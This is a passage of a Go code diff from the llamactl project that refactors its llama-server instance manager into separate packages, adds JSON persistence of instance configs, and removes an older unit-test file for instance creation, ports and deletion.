|
||||
|
||||
// Create second manager (simulating restart) - should load the instance
|
||||
manager2 := manager.NewInstanceManager(cfg)
|
||||
|
||||
loadedInstance, err := manager2.GetInstance("roundtrip-test")
|
||||
if err != nil {
|
||||
t.Fatalf("GetInstance failed after reload: %v", err)
|
||||
}
|
||||
|
||||
// Compare all data
|
||||
if loadedInstance.Name != originalInstance.Name {
|
||||
t.Errorf("Name mismatch: original=%q, loaded=%q", originalInstance.Name, loadedInstance.Name)
|
||||
}
|
||||
|
||||
originalOpts := originalInstance.GetOptions()
|
||||
loadedOpts := loadedInstance.GetOptions()
|
||||
|
||||
// Compare restart options
|
||||
if *loadedOpts.AutoRestart != *originalOpts.AutoRestart {
|
||||
t.Errorf("AutoRestart mismatch: original=%v, loaded=%v", *originalOpts.AutoRestart, *loadedOpts.AutoRestart)
|
||||
}
|
||||
if *loadedOpts.MaxRestarts != *originalOpts.MaxRestarts {
|
||||
t.Errorf("MaxRestarts mismatch: original=%v, loaded=%v", *originalOpts.MaxRestarts, *loadedOpts.MaxRestarts)
|
||||
}
|
||||
if *loadedOpts.RestartDelay != *originalOpts.RestartDelay {
|
||||
t.Errorf("RestartDelay mismatch: original=%v, loaded=%v", *originalOpts.RestartDelay, *loadedOpts.RestartDelay)
|
||||
}
|
||||
|
||||
// Compare llama server options
|
||||
if loadedOpts.Model != originalOpts.Model {
|
||||
t.Errorf("Model mismatch: original=%q, loaded=%q", originalOpts.Model, loadedOpts.Model)
|
||||
}
|
||||
if loadedOpts.Port != originalOpts.Port {
|
||||
t.Errorf("Port mismatch: original=%d, loaded=%d", originalOpts.Port, loadedOpts.Port)
|
||||
}
|
||||
if loadedOpts.Host != originalOpts.Host {
|
||||
t.Errorf("Host mismatch: original=%q, loaded=%q", originalOpts.Host, loadedOpts.Host)
|
||||
}
|
||||
if loadedOpts.CtxSize != originalOpts.CtxSize {
|
||||
t.Errorf("CtxSize mismatch: original=%d, loaded=%d", originalOpts.CtxSize, loadedOpts.CtxSize)
|
||||
}
|
||||
if loadedOpts.GPULayers != originalOpts.GPULayers {
|
||||
t.Errorf("GPULayers mismatch: original=%d, loaded=%d", originalOpts.GPULayers, loadedOpts.GPULayers)
|
||||
}
|
||||
if loadedOpts.Temperature != originalOpts.Temperature {
|
||||
t.Errorf("Temperature mismatch: original=%f, loaded=%f", originalOpts.Temperature, loadedOpts.Temperature)
|
||||
}
|
||||
if loadedOpts.TopK != originalOpts.TopK {
|
||||
t.Errorf("TopK mismatch: original=%d, loaded=%d", originalOpts.TopK, loadedOpts.TopK)
|
||||
}
|
||||
if loadedOpts.TopP != originalOpts.TopP {
|
||||
t.Errorf("TopP mismatch: original=%f, loaded=%f", originalOpts.TopP, loadedOpts.TopP)
|
||||
}
|
||||
if loadedOpts.Verbose != originalOpts.Verbose {
|
||||
t.Errorf("Verbose mismatch: original=%v, loaded=%v", originalOpts.Verbose, loadedOpts.Verbose)
|
||||
}
|
||||
if loadedOpts.FlashAttn != originalOpts.FlashAttn {
|
||||
t.Errorf("FlashAttn mismatch: original=%v, loaded=%v", originalOpts.FlashAttn, loadedOpts.FlashAttn)
|
||||
}
|
||||
if loadedOpts.HFRepo != originalOpts.HFRepo {
|
||||
t.Errorf("HFRepo mismatch: original=%q, loaded=%q", originalOpts.HFRepo, loadedOpts.HFRepo)
|
||||
}
|
||||
|
||||
// Compare slice fields
|
||||
if !reflect.DeepEqual(loadedOpts.Lora, originalOpts.Lora) {
|
||||
t.Errorf("Lora mismatch: original=%v, loaded=%v", originalOpts.Lora, loadedOpts.Lora)
|
||||
}
|
||||
|
||||
// Verify created timestamp is preserved
|
||||
if loadedInstance.Created != originalInstance.Created {
|
||||
t.Errorf("Created timestamp mismatch: original=%d, loaded=%d", originalInstance.Created, loadedInstance.Created)
|
||||
}
|
||||
}
|
||||
|
||||
// Helper function to create a test manager with standard config
|
||||
func createTestManager() manager.InstanceManager {
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
LogsDir: "/tmp/test",
|
||||
MaxInstances: 10,
|
||||
LlamaExecutable: "llama-server",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
return manager.NewInstanceManager(cfg)
|
||||
}
|
||||
@@ -1,54 +1,28 @@
|
||||
package llamactl
|
||||
package manager
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"sync"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/validation"
|
||||
"os"
|
||||
"path/filepath"
|
||||
)
|
||||
|
||||
// InstanceManager defines the interface for managing instances of the llama server.
|
||||
type InstanceManager interface {
|
||||
ListInstances() ([]*Instance, error)
|
||||
CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
|
||||
GetInstance(name string) (*Instance, error)
|
||||
UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
|
||||
DeleteInstance(name string) error
|
||||
StartInstance(name string) (*Instance, error)
|
||||
StopInstance(name string) (*Instance, error)
|
||||
RestartInstance(name string) (*Instance, error)
|
||||
GetInstanceLogs(name string) (string, error)
|
||||
}
|
||||
|
||||
type instanceManager struct {
|
||||
mu sync.RWMutex
|
||||
instances map[string]*Instance
|
||||
ports map[int]bool
|
||||
instancesConfig InstancesConfig
|
||||
}
|
||||
|
||||
// NewInstanceManager creates a new instance of InstanceManager.
|
||||
func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
|
||||
return &instanceManager{
|
||||
instances: make(map[string]*Instance),
|
||||
ports: make(map[int]bool),
|
||||
instancesConfig: instancesConfig,
|
||||
}
|
||||
}
|
||||
|
||||
// ListInstances returns a list of all instances managed by the instance manager.
|
||||
func (im *instanceManager) ListInstances() ([]*Instance, error) {
|
||||
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
defer im.mu.RUnlock()
|
||||
|
||||
instances := make([]*Instance, 0, len(im.instances))
|
||||
for _, instance := range im.instances {
|
||||
instances = append(instances, instance)
|
||||
instances := make([]*instance.Process, 0, len(im.instances))
|
||||
for _, inst := range im.instances {
|
||||
instances = append(instances, inst)
|
||||
}
|
||||
return instances, nil
|
||||
}
|
||||
|
||||
// CreateInstance creates a new instance with the given options and returns it.
|
||||
// The instance is initially in a "stopped" state.
|
||||
func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
|
||||
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
|
||||
if options == nil {
|
||||
return nil, fmt.Errorf("instance options cannot be nil")
|
||||
}
|
||||
@@ -57,12 +31,12 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
|
||||
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
|
||||
}
|
||||
|
||||
err := ValidateInstanceName(name)
|
||||
name, err := validation.ValidateInstanceName(name)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
err = ValidateInstanceOptions(options)
|
||||
err = validation.ValidateInstanceOptions(options)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -90,15 +64,19 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
|
||||
im.ports[options.Port] = true
|
||||
}
|
||||
|
||||
instance := NewInstance(name, &im.instancesConfig, options)
|
||||
im.instances[instance.Name] = instance
|
||||
inst := instance.NewInstance(name, &im.instancesConfig, options)
|
||||
im.instances[inst.Name] = inst
|
||||
im.ports[options.Port] = true
|
||||
|
||||
return instance, nil
|
||||
if err := im.persistInstance(inst); err != nil {
|
||||
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
return inst, nil
|
||||
}
|
||||
|
||||
// GetInstance retrieves an instance by its name.
|
||||
func (im *instanceManager) GetInstance(name string) (*Instance, error) {
|
||||
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
defer im.mu.RUnlock()
|
||||
|
||||
@@ -111,7 +89,7 @@ func (im *instanceManager) GetInstance(name string) (*Instance, error) {
|
||||
|
||||
// UpdateInstance updates the options of an existing instance and returns it.
|
||||
// If the instance is running, it will be restarted to apply the new options.
|
||||
func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
|
||||
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
instance, exists := im.instances[name]
|
||||
im.mu.RUnlock()
|
||||
@@ -124,7 +102,7 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
|
||||
return nil, fmt.Errorf("instance options cannot be nil")
|
||||
}
|
||||
|
||||
err := ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -149,6 +127,12 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
|
||||
}
|
||||
}
|
||||
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
if err := im.persistInstance(instance); err != nil {
|
||||
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
return instance, nil
|
||||
}
|
||||
|
||||
@@ -157,23 +141,30 @@ func (im *instanceManager) DeleteInstance(name string) error {
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
|
||||
_, exists := im.instances[name]
|
||||
instance, exists := im.instances[name]
|
||||
if !exists {
|
||||
return fmt.Errorf("instance with name %s not found", name)
|
||||
}
|
||||
|
||||
if im.instances[name].Running {
|
||||
if instance.Running {
|
||||
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
|
||||
}
|
||||
|
||||
delete(im.ports, im.instances[name].options.Port)
|
||||
delete(im.ports, instance.GetOptions().Port)
|
||||
delete(im.instances, name)
|
||||
|
||||
// Delete the instance's config file if persistence is enabled
|
||||
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
|
||||
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
|
||||
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// StartInstance starts a stopped instance and returns it.
|
||||
// If the instance is already running, it returns an error.
|
||||
func (im *instanceManager) StartInstance(name string) (*Instance, error) {
|
||||
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
instance, exists := im.instances[name]
|
||||
im.mu.RUnlock()
|
||||
@@ -189,11 +180,18 @@ func (im *instanceManager) StartInstance(name string) (*Instance, error) {
|
||||
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
err := im.persistInstance(instance)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
return instance, nil
|
||||
}
|
||||
|
||||
// StopInstance stops a running instance and returns it.
|
||||
func (im *instanceManager) StopInstance(name string) (*Instance, error) {
|
||||
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
instance, exists := im.instances[name]
|
||||
im.mu.RUnlock()
|
||||
@@ -209,11 +207,18 @@ func (im *instanceManager) StopInstance(name string) (*Instance, error) {
|
||||
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
err := im.persistInstance(instance)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
return instance, nil
|
||||
}
|
||||
|
||||
// RestartInstance stops and then starts an instance, returning the updated instance.
|
||||
func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
|
||||
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
|
||||
instance, err := im.StopInstance(name)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
@@ -234,16 +239,3 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
|
||||
// TODO: Implement actual log retrieval logic
|
||||
return fmt.Sprintf("Logs for instance %s", name), nil
|
||||
}
|
||||
|
||||
func (im *instanceManager) getNextAvailablePort() (int, error) {
|
||||
portRange := im.instancesConfig.PortRange
|
||||
|
||||
for port := portRange[0]; port <= portRange[1]; port++ {
|
||||
if !im.ports[port] {
|
||||
im.ports[port] = true
|
||||
return port, nil
|
||||
}
|
||||
}
|
||||
|
||||
return 0, fmt.Errorf("no available ports in the specified range")
|
||||
}
|
||||
@@ -1,501 +0,0 @@
|
||||
package llamactl_test
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestNewInstanceManager(t *testing.T) {
|
||||
config := llamactl.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
LogDirectory: "/tmp/test",
|
||||
MaxInstances: 5,
|
||||
LlamaExecutable: "llama-server",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
manager := llamactl.NewInstanceManager(config)
|
||||
if manager == nil {
|
||||
t.Fatal("NewInstanceManager returned nil")
|
||||
}
|
||||
|
||||
// Test initial state
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 0 {
|
||||
t.Errorf("Expected empty instance list, got %d instances", len(instances))
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if instance.Name != "test-instance" {
|
||||
t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
|
||||
}
|
||||
if instance.Running {
|
||||
t.Error("New instance should not be running")
|
||||
}
|
||||
if instance.GetOptions().Port != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_DuplicateName(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create first instance
|
||||
_, err := manager.CreateInstance("test-instance", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("First CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Try to create duplicate
|
||||
_, err = manager.CreateInstance("test-instance", options2)
|
||||
if err == nil {
|
||||
t.Error("Expected error for duplicate instance name")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "already exists") {
|
||||
t.Errorf("Expected duplicate name error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
|
||||
// Create manager with low max instances limit
|
||||
config := llamactl.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
MaxInstances: 2, // Very low limit for testing
|
||||
}
|
||||
manager := llamactl.NewInstanceManager(config)
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options3 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create instances up to the limit
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// This should fail due to max instances limit
|
||||
_, err = manager.CreateInstance("instance3", options3)
|
||||
if err == nil {
|
||||
t.Error("Expected error when exceeding max instances limit")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
|
||||
t.Errorf("Expected max instances error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortAssignment(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create instance without specifying port
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should auto-assign a port in the range
|
||||
port := instance.GetOptions().Port
|
||||
if port < 8000 || port > 9000 {
|
||||
t.Errorf("Expected port in range 8000-9000, got %d", port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortConflictDetection(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080, // Explicit port
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model2.gguf",
|
||||
Port: 8080, // Same port - should conflict
|
||||
},
|
||||
}
|
||||
|
||||
// Create first instance
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
// Try to create second instance with same port
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err == nil {
|
||||
t.Error("Expected error for port conflict")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
|
||||
t.Errorf("Expected port conflict error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create multiple instances and verify they get different ports
|
||||
instance1, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
instance2, err := manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
port1 := instance1.GetOptions().Port
|
||||
port2 := instance2.GetOptions().Port
|
||||
|
||||
if port1 == port2 {
|
||||
t.Errorf("Expected different ports, both got %d", port1)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortExhaustion(t *testing.T) {
|
||||
// Create manager with very small port range
|
||||
config := llamactl.InstancesConfig{
|
||||
PortRange: [2]int{8000, 8001}, // Only 2 ports available
|
||||
MaxInstances: 10, // Higher than available ports
|
||||
}
|
||||
manager := llamactl.NewInstanceManager(config)
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options3 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create instances to exhaust all ports
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// This should fail due to port exhaustion
|
||||
_, err = manager.CreateInstance("instance3", options3)
|
||||
if err == nil {
|
||||
t.Error("Expected error when ports are exhausted")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
|
||||
t.Errorf("Expected port exhaustion error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_PortRelease(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
// Create instance with specific port
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Delete the instance
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should be able to create new instance with same port
|
||||
_, err = manager.CreateInstance("new-instance", options)
|
||||
if err != nil {
|
||||
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance first
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
created, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Retrieve it
|
||||
retrieved, err := manager.GetInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("GetInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if retrieved.Name != created.Name {
|
||||
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
_, err := manager.GetInstance("nonexistent")
|
||||
if err == nil {
|
||||
t.Error("Expected error for nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestListInstances(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Initially empty
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 0 {
|
||||
t.Errorf("Expected 0 instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Create some instances
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// List should return both
|
||||
instances, err = manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 2 {
|
||||
t.Errorf("Expected 2 instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Check names are present
|
||||
names := make(map[string]bool)
|
||||
for _, instance := range instances {
|
||||
names[instance.Name] = true
|
||||
}
|
||||
if !names["instance1"] || !names["instance2"] {
|
||||
t.Error("Expected both instance1 and instance2 in list")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Delete it
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should no longer exist
|
||||
_, err = manager.GetInstance("test-instance")
|
||||
if err == nil {
|
||||
t.Error("Instance should not exist after deletion")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
err := manager.DeleteInstance("nonexistent")
|
||||
if err == nil {
|
||||
t.Error("Expected error for deleting nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestUpdateInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Update it
|
||||
newOptions := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
|
||||
updated, err := manager.UpdateInstance("test-instance", newOptions)
|
||||
if err != nil {
|
||||
t.Fatalf("UpdateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
|
||||
}
|
||||
if updated.GetOptions().Port != 8081 {
|
||||
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestUpdateInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
_, err := manager.UpdateInstance("nonexistent", options)
|
||||
if err == nil {
|
||||
t.Error("Expected error for updating nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// Helper function to create a test manager with standard config
|
||||
func createTestManager() llamactl.InstanceManager {
|
||||
config := llamactl.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
LogDirectory: "/tmp/test",
|
||||
MaxInstances: 10,
|
||||
LlamaExecutable: "llama-server",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
return llamactl.NewInstanceManager(config)
|
||||
}
|
||||
@@ -1,10 +1,13 @@
|
||||
package llamactl
|
||||
package server
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/manager"
|
||||
"net/http"
|
||||
"os/exec"
|
||||
"strconv"
|
||||
@@ -14,14 +17,14 @@ import (
|
||||
)
|
||||
|
||||
type Handler struct {
|
||||
InstanceManager InstanceManager
|
||||
config Config
|
||||
InstanceManager manager.InstanceManager
|
||||
cfg config.AppConfig
|
||||
}
|
||||
|
||||
func NewHandler(im InstanceManager, config Config) *Handler {
|
||||
